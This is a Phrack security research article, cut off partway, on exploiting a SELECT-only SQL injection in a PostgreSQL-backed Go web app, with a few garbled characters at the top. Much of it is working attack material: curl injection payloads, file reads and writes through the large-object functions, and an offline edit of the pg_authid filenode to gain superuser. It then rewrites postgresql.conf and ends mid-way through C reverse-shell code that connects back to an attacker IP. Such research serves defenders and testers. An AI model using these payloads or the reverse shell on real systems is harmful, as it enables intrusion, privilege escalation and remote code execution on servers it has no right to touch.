,A(0$3JZR>W7UHL1B-)KN^75/STSWS*CX^K)S?7^U
M\1\5-V].WE:P7+ER^O;T%W;Z)V!)
M7$O/UUW&?G$=QS]4[J7W_Z57..........
...........................
.........................
====================================================
Title : World of SELECT-only PostgreSQL Injections
Author : Maksym Vatsyk
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x08 of 0x11
|=-----------------------------------------------------------------------=|
|=-----------=[ World of SELECT-only PostgreSQL Injections: ]=-----------=|
|=--------------------=[ (Ab)using the filesystem ]=---------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[ Maksym Vatsyk ]=---------------------------=|
|=-----------------------------------------------------------------------=|
-- Table of contents
0 - Introduction
1 - The SQLi that started it all
1.0 - Target info
1.1 - A rather trivial injection
1.2 - No stacked queries for you
1.3 - Abusing server-side lo_ functions
1.4 - Not (entirely) a superuser
1.5 - Looking for a privesc
2 - PostgreSQL storage concepts
2.0 - Tables and Filenodes
2.1 - Filenode format
2.2 - Table metadata
2.3 - Cold and Hot Data storages
2.4 - Editing filenodes offline
3 - Updating the PostgreSQL data without UPDATE
3.0 - Identifying target table
3.1 - Search for the associated Filenode
3.2 - Reading and downloading Filenode
3.3 - Extracting table metadata
3.4 - Making ourselves a superuser
3.5 - Flushing Hot storage
4 - SELECT-only RCE
4.0 - Reading original postgresql.conf
4.1 - Choosing a parameter to exploit
4.2 - Compiling malicious library
4.3 - Uploading the stuff back to the server
4.4 - Reload successful
5 - Conclusions
6 - References
7 - Source code
--[ 0 - Introduction
This article tells the story of how a failed attempt to exploit a basic
SQL injection in a web API with the PostgreSQL DBMS quickly spiraled into
3 months of researching database source code and (hopefully) helping to
create several new techniques to pwn Postgres hosts in restrictive
contexts. Let's get into the story, shall we?
--[ 1 - The SQLi that started it all
---[ 1.0 - Target info
The target web app was written in the Golang Gin[0] framework and used
PGX[1] as a DB driver. What is interesting about the application is the
fact that it is a trusted public data repository - anyone can query all
data. The updates, however, are limited to a trusted set of users.
This means that getting a SELECT SQL injection will have no impact on the
application, while DELETE and UPDATE ones will still be critical.
Unfortunately, I am not allowed to disclose the source code of
the original application, but it can be roughly boiled down to this
example (with data and tables changed to something artificial):
--------------------------------------------------------------------------
package main
import (
"context"
"fmt"
"log"
"net/http"
"github.com/gin-gonic/gin"
"github.com/jackc/pgx/v4/pgxpool"
)
var pool *pgxpool.Pool
type Phrase struct {
ID int `json:"id"`
Text string `json:"text"`
}
func phraseHandler(c *gin.Context) {
phrases := []Phrase{}
phrase_id := c.DefaultQuery("id", "1")
query := fmt.Sprintf(
"SELECT id, text FROM phrases WHERE id=%s",
phrase_id
)
rows, err := pool.Query(context.Background(), query)
defer rows.Close()
if err != nil {
c.JSON(
http.StatusInternalServerError,
gin.H{"error": err.Error()}
)
return
}
for rows.Next() {
var phrase Phrase
err := rows.Scan(&phrase.ID, &phrase.Text)
if err != nil {
c.JSON(
http.StatusInternalServerError,
gin.H{"error": err.Error()}
)
return
}
phrases = append(phrases, phrase)
}
c.JSON(http.StatusOK, phrases)
}
func main() {
pool, _ = pgxpool.Connect(
context.Background(),
"postgres://localhost/postgres?user=poc_user&password=poc_pass")
r := gin.Default()
r.GET("/phrases", phraseHandler)
r.Run(":8000")
defer pool.Close()
}
--------------------------------------------------------------------------
---[ 1.1 - A rather trivial injection
The actual injection happens inside the phraseHandler function on these
lines of code. The app directly formats the query parameter id into
the query string and calls the pool.Query() function. It couldn't be any
simpler, right?
--------------------------------------------------------------------------
phrase_id := c.DefaultQuery("id", "1")
query := fmt.Sprintf(
"SELECT id, text FROM phrases WHERE id=%s",
phrase_id
)
rows, err := pool.Query(context.Background(), query)
defer rows.Close()
--------------------------------------------------------------------------
The SQL injection can be quickly confirmed with these cURL requests:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode "id=1"
[
{"id":1,"text":"Hello, world!"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode "id=-1"
[]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode "id=-1 OR 1=1"
[
{"id":1,"text":"Hello, world!"},
{"id":2,"text":"A day in paradise."},
...
{"id":14,"text":"Find your inner peace."},
{"id":15,"text":"Dance in the rain"}
]
--------------------------------------------------------------------------
At this moment, our SQL query will look something like:
--------------------------------------------------------------------------
SELECT id, text FROM phrases WHERE id=-1 OR 1=1
--------------------------------------------------------------------------
Luckily for us, PostgreSQL drivers should easily support stacked queries,
opening a wide range of attack vectors for us. We should be able to append
additional queries separated by a semicolon like:
--------------------------------------------------------------------------
SELECT id, text FROM phrases WHERE id=-1; SELECT pg_sleep(5);
--------------------------------------------------------------------------
Let's just try it... Oh no, what is that?
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" \
--data-urlencode "id=-1; SELECT pg_sleep(5)"
{
"error":"ERROR: cannot insert multiple commands into a prepared
statement (SQLSTATE 42601)"
}
--------------------------------------------------------------------------
---[ 1.1 - No stacked queries for you
It turns out that the PGX developers decided to **secure** driver use
by converting any SQL query to a prepared statement under the hood.
This is done to disable any stacked queries whatsoever[2]. It works
because the the PostgreSQL database itself does not allow multiple queries
inside a single prepared statement[3].
So, we are suddenly constrained to a single SELECT query! The DBMS will
reject any stacked queries, and nested UPDATE or DELETE queries are also
prohibited by the SQL syntax.
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 OR (UPDATE * phrases SET text='lol')"
{
"error":"ERROR: syntax error at or near \"SET\" (SQLSTATE 42601)"
}
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 OR (DELETE * FROM phrases)"
{
"error":"ERROR: syntax error at or near \"FROM\" (SQLSTATE 42601)"
}
--------------------------------------------------------------------------
Nested SELECT queries are still possible, though!
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 OR (SELECT 1)=1"
[
{"id":1,"text":"Hello, world!"},
...
{"id":14,"text":"Find your inner peace."},
{"id":15,"text":"Dance in the rain"}
]
--------------------------------------------------------------------------
Since one can read the DB data without the SQLi, is this bug even worth
reporting?
---[ 1.2 - Abusing server-side lo_ functions
Not all hope is lost, though! Since nested SELECT SQL queries are allowed,
we can try to call some of the built-in PostgreSQL functions and see if
there are any that can help us.
PostgreSQL has several functions that allow reading files from and writing
to the server running the DBMS. These functions[4] are a part of the
PostgreSQL Large Objects functionality, and should be accessible
to the superusers by default:
1. lo_import(path_to_file, lo_id) - read the file into the DB large object
2. lo_export(lo_id, path_to_file) - dump the large object into a file
What files can be read? Since the DBMS is normally running under the
postgres user, we can search for readable files via the following
command:
--------------------------------------------------------------------------
$ cat /etc/passwd | grep postgres
postgres:x:129:129::/var/lib/postgresql:/bin/bash
$ find / -uid 129 -type f -perm -600 2>/dev/null
...
/var/lib/postgresql/data/postgresql.conf <---- main service config
/var/lib/postgresql/data/pg_hba.conf <---- authentication config
/var/lib/postgresql/data/pg_ident.conf <---- psql username mapping
...
/var/lib/postgresql/13/main/base/1/2654 <---- some data files
/var/lib/postgresql/13/main/base/1/2613
--------------------------------------------------------------------------
There already is an RCE technique, initially discovered by Denis
Andzakovic[5] and sylsTyping[6] in 2021 and 2022, which takes advantage
of the postgresql.conf file.
It involves overwriting the config file and either waiting for the server
to reboot or forcefully reloading the configuration via the
pg_reload_conf() PostgreSQL function[7].
We will return to this matter later in the article. For now, let's just
check if we have the permissions to call every function mentioned above.
Calling lo_ functions:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT lo_import('/var/lib/postgresql/data/postgresql.conf', 31337)) AS text)"
[
{"id":1337,"text":"31337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT lo_get(31337)) AS text)"
[
{"id":1337,"text":"\\x23202d2d2d...72650a"}
]
--------------------------------------------------------------------------
Large object functions work just fine! We've imported a file into the DB
and consequently read it from the object with ID 31337.
Calling pg_reload_conf function:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT pg_reload_conf()) AS text)"
[]
--------------------------------------------------------------------------
There is a problem with the pg_reload_conf function, however. In success
cases, it should return a row with the text "true".
Why can we call large object functions but not pg_reload_conf?
Shouldn't they both be accessible to a superuser?
---[ 1.3 - Not (entirely) a superuser
They should, but we happen to not be one. Our test user has explicit
permissions over the large object functions but lacks access to anything
else. The permissions should be similar to the below example
configuration:
--------------------------------------------------------------------------
CREATE USER poc_user WITH PASSWORD 'poc_pass'
GRANT pg_read_server_files TO poc_user
GRANT pg_write_server_files TO poc_user
GRANT USAGE ON SCHEMA public TO poc_user
GRANT SELECT, INSERT, UPDATE, DELETE ON TABLE pg_largeobject TO poc_user
GRANT EXECUTE ON FUNCTION lo_export(oid, text) TO poc_user
GRANT EXECUTE ON FUNCTION lo_import(text, oid) TO poc_user
--------------------------------------------------------------------------
---[ 1.4 - Looking for a privesc
If we want to perform RCE through the configuration file reliably, we must
find a way to become a superuser and call pg_reload_conf(). Unlike the
popular topic of PostgreSQL RCE techniques, there is not a whole lot of
information about privilege escalation from within the DB.
Luckily for us, the official documentation page for Large Object functions
gives us some clues for the next steps[4]:
> It is possible to GRANT use of the server-side lo_import and lo_export
> functions to non-superusers, but careful consideration of the security
> implications is required. A malicious user of such privileges could
> easily parlay them into becoming superuser (for example by rewriting
> server configuration files)
What if we were to modify the PostgreSQL table data directly, on disk,
without any UPDATE queries at all?
--[ 2 - PostgreSQL storage concepts
---[ 2.0 - Tables and Filenodes
PostgreSQL has extremely complex data flows to optimize resource usage and
eliminate possible data access conflicts, e.g. race conditions. You can
read about them in great detail in the official documentation[8][9].
The physical data layout significantly differs from the widely known
"table" and "row" objects. All data is stored on disk in a Filenode object
named with the OID of the respective pg_class object.
In other words, each table has its Filenode. We can lookup the OID and
respective Filenode names of a given table through the following queries:
--------------------------------------------------------------------------
SELECT oid FROM pg_class WHERE relname='TABLE_NAME'
// OR
SELECT pg_relation_filepath('TABLE_NAME');
--------------------------------------------------------------------------
All of the filenodes are stored in the PostgreSQL data directory. The path
to which can be queried from the pg_settings table by superusers:
--------------------------------------------------------------------------
SELECT setting FROM pg_settings WHERE name = 'data_directory';
--------------------------------------------------------------------------
However, this value should generally be the same across different
installations of the DBMS and can be easily guessed by a third party.
A common path for PostgreSQL data directories on Debian systems is
"/var/lib/postgresql/MAJOR_VERSION/CLUSTER_NAME/".
We can obtain the major version by running a "SELECT version()" query in
the SQLi. The default value of CLUSTER_NAME is "main".
An example path of a filenode for our "phrases" would be:
--------------------------------------------------------------------------
=== in psql ===
postgres=# SELECT pg_relation_filepath('phrases');
pg_relation_filepath
----------------------
base/13485/65549
(1 row)
postgres=# SELECT version();
version
-------------------------------------------------------------------------------------------------------------------------------------
PostgreSQL 13.13 (Ubuntu 13.13-1.pgdg22.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit
(1 row)
=== in bash ===
$ ll /var/lib/postgresql/13/main/base/13485/65549
-rw------- 1 postgres postgres 8192 mar 14 13:45 /var/lib/postgresql/13/main/base/13485/65549
--------------------------------------------------------------------------
So: all of the files with numeric names, found in section 1.2, are in
fact separate table filenodes that the postgres user can read and write!
---[ 2.1 - Filenode format
A Filenode is a binary file composed of separate chunks of 0x2000 bytes
called Pages. Each page holds the actual row data within nested Item
objects. The layout of each Filenode can be summarized with the below
diagram:
+----------+
| Filenode |
+----------+-------------------------------------------------------+
| |
| +--------+ |
| | Page 1 | |
| +--------+----+---------+---------+-----+---------+--------+ |
| | Page Header |Item ID 1|Item ID 2| ... |Item ID n| | |
| +-------------+----+----+---------+ +----+----+ | |
| | | | | |
| | +-------------------------+--------+ | |
| | | | | |
| | +-------------------------------------+ | | |
| | | | | |
| | | ... empty space padded with 0x00 ... | | |
| | | | | |
| | +----------------------+ | | |
| | | | | |
| | v v | |
| | +--------+ +--------+--------+ |
| | | Item n | ... | Item 2 | Item 1 | |
| +-------------------------+--------+-----+--------+--------+ |
| ... |
| +--------+ |
| | Page n | |
| +--------+ |
| ... |
| |
+------------------------------------------------------------------+
---[ 2.2 - Table metadata
It is worth noting that the Item objects are stored in the binary format
and cannot be manipulated directly. One must first deserialize them using
metadata from the internal PostgreSQL "pg_attribute" table. We can query
Item metadata using the following SQL query:
--------------------------------------------------------------------------
SELECT
STRING_AGG(
CONCAT_WS(
',',
attname,
typname,
attlen,
attalign
),
';'
)
FROM pg_attribute
JOIN pg_type
ON pg_attribute.atttypid = pg_type.oid
JOIN pg_class
ON pg_attribute.attrelid = pg_class.oid
WHERE pg_class.relname = 'TABLE_NAME';
--------------------------------------------------------------------------
---[ 2.3 - Cold and Hot data storage
All of the above objects make up the DBMS' cold storage. To access the
data in cold storage through a query, Postgres must first load it in the
RAM cache, a.k.a. hot storage.
The following diagram shows a rough and simplified flow of how the
PostgreSQL accesses the data:
+------------------+ +--------+ +------+ +------+
|Table in RAM cache|------>|Filenode|--+--->|Page 1|---+--->|Item 1|
+------------------+ +--------+ | +------+ | +------+
| |
| +------+ | +------+
+--->|Page 2| +--->|Item 2|
| +------+ | +------+
| ... | ...
| +------+ | +------+
+--->|Page n| +--->|Item n|
+------+ +------+
The DBMS periodically flushes any changes to the data in hot storage to
the filesystem.
These syncs may pose a challenge to us! Since we can only edit the cold
storage of a running database, we risk subsequent hot storage syncs
overwriting our edits. Thus, we must ensure that the table we want to
overwrite has been offloaded from the cache.
--------------------------------------------------------------------------
# -----------------------------
# PostgreSQL configuration file
# -----------------------------
...
# - Memory -
shared_buffers = 128MB # min 128kB
# (change requires restart)
...
--------------------------------------------------------------------------
The default cache size is 128MB. So, if we stress the DB with expensive
queries to other tables/large objects before the flush, we might overflow
the cache and clear our target table from it.
---[ 2.4 - Editing filenodes offline
I've created a tool to parse and modify data stored in filenodes, which
functions independently of the Postgres server that created the filenodes.
We can use it to overwrite target table rows with our desired values.
The editor supports both datatype-assisted and raw parsing modes. The
assisted mode is the preferred option as it allows you to edit the data
safely, without accidentally messing up the whole filenode structure.
The actual parsing implementation is way too lengthy to discuss in this
article, but you can find the sources on GitHub[10], or the source code
in this article if reading online, if you want to dig deeper into it.
You can also check out this article[12] on parsing filenodes in Golang.
--[ 3 - Updating the PostgreSQL data without UPDATE
---[ 3.0 - Identifying target table
So, we are looking to escalate our permissions to those of a DBMS
superuser. Which table should we aim to modify? All Postgres permissions
are stored in the internal table "pg_authid". All CREATE/DROP/ALTER
statements for new roles and users actually modify this table under the
hood. Let's inspect it in a PSQL session under the default super-admin
user:
--------------------------------------------------------------------------
postgres=# SELECT * FROM pg_authid; \x
-[ RECORD 1 ]--+------------------------------------
oid | 3373
rolname | pg_monitor
rolsuper | f
rolinherit | t
rolcreaterole | f
rolcreatedb | f
rolcanlogin | f
rolreplication | f
rolbypassrls | f
rolconnlimit | -1
rolpassword |
rolvaliduntil |
... TRUNCATED ...
-[ RECORD 9 ]--+------------------------------------
oid | 10
rolname | postgres
rolsuper | t
rolinherit | t
rolcreaterole | t
rolcreatedb | t
rolcanlogin | t
rolreplication | t
rolbypassrls | t
rolconnlimit | -1
rolpassword |
rolvaliduntil |
-[ RECORD 10 ]-+------------------------------------
oid | 16386
rolname | poc_user
rolsuper | f
rolinherit | t
rolcreaterole | f
rolcreatedb | f
rolcanlogin | t
rolreplication | f
rolbypassrls | f
rolconnlimit | -1
rolpassword | md58616944eb80b569f7be225c2442582cd
rolvaliduntil |
--------------------------------------------------------------------------
The table contains a bunch of "rol" boolean flags and other interesting
stuff, like the MD5 hashes of the user logon passwords. The default
superadmin user "postgres" has all boolean flags set to true.
To become a superuser, we must flip all boolean fields to True for our
user, "poc_user".
---[ 3.1 - Search for the associated Filenode
To modify the table, we must first locate and read the filenode from the
disk. As discussed previously, we won't be able to get the data directory
setting from the DBMS, as we lack permissions to read the "pg_settings"
table:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, (SELECT setting FROM pg_settings WHERE name='data_directory')"
{
"error":"can't scan into dest[1]: cannot scan null into *string"
}
--------------------------------------------------------------------------
However, we can reliably guess the data directory path by querying the
version of the DBMS:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, (SELECT version())"
[
{"id":1337,"text":"PostgreSQL 13.13 (Ubuntu 13.13-1.pgdg22.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit"}
]
--------------------------------------------------------------------------
Version information gives us more than enough knowledge about the DBMS
and the underlying server. We can simply install a major version of
PostgreSQL release 13 on our own Ubuntu 22 VM and find that the data
directory is "/var/lib/postgresql/13/main":
--------------------------------------------------------------------------
ubuntu@ubuntu-virtual-machine:~$ uname -a
Linux ubuntu-virtual-machine 6.5.0-14-generic #14~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Mon Nov 20 18:15:30 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
ubuntu@ubuntu-virtual-machine:~$ sudo su postgres
postgres@ubuntu-virtual-machine:~$ pwd
/var/lib/postgresql
postgres@ubuntu-virtual-machine:~$ ls -l 13/main/
total 84
drwx------ 5 postgres postgres 4096 lis 26 14:48 base
drwx------ 2 postgres postgres 4096 mar 15 11:56 global
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_commit_ts
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_dynshmem
drwx------ 4 postgres postgres 4096 mar 15 11:55 pg_logical
drwx------ 4 postgres postgres 4096 lis 26 14:48 pg_multixact
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_notify
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_replslot
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_serial
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_snapshots
drwx------ 2 postgres postgres 4096 mar 11 00:45 pg_stat
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_stat_tmp
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_subtrans
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_tblspc
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_twophase
-rw------- 1 postgres postgres 3 lis 26 14:48 PG_VERSION
drwx------ 3 postgres postgres 4096 lut 4 00:22 pg_wal
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_xact
-rw------- 1 postgres postgres 88 lis 26 14:48 postgresql.auto.conf
-rw------- 1 postgres postgres 130 mar 15 11:55 postmaster.opts
-rw------- 1 postgres postgres 100 mar 15 11:55 postmaster.pid
--------------------------------------------------------------------------
With the data directory path obtained, we can query the relative path to
the "pg_authid" Filenode. Thankfully, there are no permission issues this
time.
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, (SELECT pg_relation_filepath('pg_authid'))"
[
{"id":1337,"text":"global/1260"}
]
--------------------------------------------------------------------------
With all the information in our hands, we can assume that the "pg_authid"
Filenode is located at "/var/lib/postgresql/13/main/global/1260".
Let's download it to our local machine from the target server.
---[ 3.2 - Reading and downloading the Filenode
We can now quickly download the file as a base64 string through the
Large Object functions "lo_import" and "lo_get" in the following steps:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_import('/var/lib/postgresql/13/main/global/1260', 331337)) AS text)"
[
{"id":1337,"text":"331337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,translate(encode(lo_get(331337), 'base64'), E'\n', '')" | jq ".[].text" -r | base64 -d > pg_authid_filenode
--------------------------------------------------------------------------
After decoding the Base64 into a file, we can confirm that we indeed
successfully downloaded the "pg_authid" Filenode by comparing the hashes.
--------------------------------------------------------------------------
=== on the attacker server ===
$ md5sum pg_authid_filenode
4c9514c6fb515907b75b8ac04b00f923 pg_authid_filenode
=== on the target server ===
postgres@ubuntu-virtual-machine:~$ md5sum /var/lib/postgresql/13/main/global/1260
4c9514c6fb515907b75b8ac04b00f923 /var/lib/postgresql/13/main/global/1260
--------------------------------------------------------------------------
---[ 3.3 - Extracting table metadata
One last step before parsing the downloaded Filenode -- we must get its
metadata from the server via the following SQLi query:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,STRING_AGG(CONCAT_WS(',',attname,typname,attlen,attalign),';') FROM pg_attribute JOIN pg_type ON pg_attribute.atttypid = pg_type.oid JOIN pg_class ON pg_attribute.attrelid = pg_class.oid WHERE pg_class.relname = 'pg_authid'"
[
{"id":1337,"text":"tableoid,oid,4,i;cmax,cid,4,i;xmax,xid,4,i;cmin,cid,4,i;xmin,xid,4,i;ctid,tid,6,s;oid,oid,4,i;rolname,name,64,c;rolsuper,bool,1,c;rolinherit,bool,1,c;rolcreaterole,bool,1,c;rolcreatedb,bool,1,c;rolcanlogin,bool,1,c;rolreplication,bool,1,c;rolbypassrls,bool,1,c;rolconnlimit,int4,4,i;rolpassword,text,-1,i;rolvaliduntil,timestamptz,8,d"}
]
--------------------------------------------------------------------------
We should now be able to use our in-house Python3 Filenode editor to list
the data and confirm it is intact. The output for the "rolname" field will
be a bit ugly, because for some reason this field is stored in a 64-byte
fixed-length string padded with null bytes, instead of the common varchar
type:
--------------------------------------------------------------------------
$ python3 postgresql_filenode_editor.py \
-f ./pg_authid_filenode \
-m list \
--datatype-csv "tableoid,oid,4,i;cmax,cid,4,i;xmax,xid,4,i;cmin,cid,4,i;xmin,xid,4,i;ctid,tid,6,s;oid,oid,4,i;rolname,name,64,c;rolsuper,bool,1,c;rolinherit,bool,1,c;rolcreaterole,bool,1,c;rolcreatedb,bool,1,c;rolcanlogin,bool,1,c;rolreplication,bool,1,c;rolbypassrls,bool,1,c;rolconnlimit,int4,4,i;rolpassword,text,-1,i;rolvaliduntil,timestamptz,8,d"
[+] Page 0:
--------- item no. 0 ---------
oid : 10
rolname : b'postgres\x00...'
rolsuper : 1
rolinherit : 1
rolcreaterole : 1
rolcreatedb : 1
rolcanlogin : 1
rolreplication: 1
rolbypassrls : 1
rolconnlimit : -1
rolpassword : None
--------- item no. 1 ---------
oid : 3373
rolname : b'pg_monitor\x00...'
rolsuper : 0
rolinherit : 1
rolcreaterole : 0
rolcreatedb : 0
rolcanlogin : 0
rolreplication: 0
rolbypassrls : 0
rolconnlimit : -1
rolpassword : None
... TRUNCATED ...
--------- item no. 9 ---------
oid : 16386
rolname : b'poc_user\x00...'
rolsuper : 0
rolinherit : 1
rolcreaterole : 0
rolcreatedb : 0
rolcanlogin : 1
rolreplication: 0
rolbypassrls : 0
rolconnlimit : -1
rolpassword : b'md58616944eb80b569f7be225c2442582cd'
--------------------------------------------------------------------------
---[ 3.4 - Making ourselves a superuser
We can now use the Filenode editor to update Item no. 9, which contains
the entry for "poc_user". For convenience, we can pass any non-printable
fields (such as the "rolname" field) as base64 string. We will flip all
"rol" flags to 1 with the following editor command:
--------------------------------------------------------------------------
$ python3 postgresql_filenode_editor.py \
-f ./pg_authid_filenode \
-m update \
-p 0 \
-i 9 \
--datatype-csv "tableoid,oid,4,i;cmax,cid,4,i;xmax,xid,4,i;cmin,cid,4,i;xmin,xid,4,i;ctid,tid,6,s;oid,oid,4,i;rolname,name,64,c;rolsuper,bool,1,c;rolinherit,bool,1,c;rolcreaterole,bool,1,c;rolcreatedb,bool,1,c;rolcanlogin,bool,1,c;rolreplication,bool,1,c;rolbypassrls,bool,1,c;rolconnlimit,int4,4,i;rolpassword,text,-1,i;rolvaliduntil,timestamptz,8,d" \
--csv-data "16386,cG9jX3VzZXIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==,1,1,1,1,1,1,1,-1,md58616944eb80b569f7be225c2442582cd,NULL"
--------------------------------------------------------------------------
The script will save the updated Filenode to a file with ".new" as an
extension. We can now re-upload the data to the PostgreSQL server and
overwrite the original data through the SQLi.
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(3331337, decode('$(base64 -w 0 pg_authid_filenode.new)', 'base64'))) AS text)"
[
{"id":1337,"text":"3331337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_export(3331337, '/var/lib/postgresql/13/main/global/1260')) AS text)"
[{"id":1337,"text":"1"}]
--------------------------------------------------------------------------
So, we've just overwritten the Filenode on the disk! But the RAM cache
still has the old data. We must find a way to flush it somehow:
--------------------------------------------------------------------------
postgres=# SELECT * FROM pg_authid WHERE rolname='poc_user'; \x
-[ RECORD 1 ]--+------------------------------------
oid | 16386
rolname | poc_user
rolsuper | f
rolinherit | t
rolcreaterole | f
rolcreatedb | f
rolcanlogin | t
rolreplication | f
rolbypassrls | f
rolconnlimit | -1
rolpassword | md58616944eb80b569f7be225c2442582cd
rolvaliduntil |
--------------------------------------------------------------------------
---[ 3.5 - Flushing Hot storage
So, you may be wondering - how can we force the server to clean the RAM
cache? How about creating a Large Object of a size matching the entire
cache pool? :DDDDD
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(33331337, (SELECT REPEAT('a', 128*1024*1024))::bytea)) AS text)"
[
{"id":1337,"text":"33331337"}
]
--------------------------------------------------------------------------
The server took at least 5 seconds to process our query, which may
indicate our success. Let's check our permissions again:
--------------------------------------------------------------------------
postgres=# SELECT * FROM pg_authid WHERE rolname='poc_user'; \x
-[ RECORD 1 ]--+------------------------------------
oid | 16386
rolname | poc_user
rolsuper | t
rolinherit | t
rolcreaterole | t
rolcreatedb | t
rolcanlogin | t
rolreplication | t
rolbypassrls | t
rolconnlimit | -1
rolpassword | md58616944eb80b569f7be225c2442582cd
rolvaliduntil |
--------------------------------------------------------------------------
Success! All "rol" flags were flipped to true! Can we reload the config
now?
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT pg_reload_conf()) AS text)"
[
{"id":1337,"text":"true"}
]
--------------------------------------------------------------------------
Notice that this query now returns a row with "text" set to "true",
confirming that we are indeed able to reload the config now.
That's more like it! We can now perform SELECT-only RCE.
--[ 4 - SELECT-only RCE
---[ 4.0 - Reading original postgresql.conf
The first step in performing the RCE is to download the original config
file. Since we are a super-admin now, we can query its path directly from
the "pg_settings" table without any extra path guessing effort:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, sourcefile FROM pg_file_settings"
[
{"id":1337,"text":"/etc/postgresql/13/main/postgresql.conf"}
]
--------------------------------------------------------------------------
Let's download it with the help of previously used Large Object functions:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT lo_import('/etc/postgresql/13/main/postgresql.conf', 3333331337)) AS text)"
[
{"id":1337,"text":"3333331337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,translate(encode(lo_get(3333331337), 'base64'), E'\n', '')" | jq ".[].text" -r | base64 -d > postgresql.conf
--------------------------------------------------------------------------
---[ 4.1 - Choosing a parameter to exploit
There are several known options that can already be used for an RCE:
- ssl_passphrase_command (by Denis Andzakovic[5])
- archive_command (by sylsTyping[6])
But are any other parameters worth looking into?
--------------------------------------------------------------------------
$ cat postgresql.conf
...
# - Shared Library Preloading -
#local_preload_libraries = ''
#session_preload_libraries = ''
#shared_preload_libraries = '' # (change requires restart)
...
# - Other Defaults -
#dynamic_library_path = '$libdir'
--------------------------------------------------------------------------
These parameters specify libraries to be loaded dynamically by the DBMS
from the path specified in the "dynamic_library_path" variable, under
specific conditions. That sounds promising!
We will focus on the "session_preload_libraries" variable, which dictates
what libraries should be preloaded by the server on a new connection[11].
It does not require a restart of the server, unlike
"shared_preload_libraries", and does not have a specific prefix prepended
to the path like the "local_preload_libraries" variable.
So, we can rewrite the malicious postgresql.conf to have a writable
directory in the "dynamic_library_path", e.g. /tmp, and to have a
rogue library filename in the "shared_preload_libraries", e.g.
"payload.so".
The updated config file will look like this:
--------------------------------------------------------------------------
$ cat postgresql.conf
...
# - Shared Library Preloading -
session_preload_libraries = 'payload.so'
...
# - Other Defaults -
dynamic_library_path = '/tmp:$libdir'
--------------------------------------------------------------------------
---[ 4.2 - Compiling the malicious library
One of the final steps is to compile a malicious library for the server to
load. The code will naturally vary depending on the OS the DBMS is running
under. For the Unix-like case, let's compile the following simple reverse
shell into an .so file. The "_init()" function will automatically fire on
library load:
--------------------------------------------------------------------------
#include
#include
#include
#include
#include
#include
#include
#include "postgres.h"
#include "fmgr.h"
#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif
void _init() {
/*
code taken from https://www.revshells.com/
*/
int port = 8888;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("172.23.16.1");
connect(sockt, (struct sockaddr *) &revsockaddr,
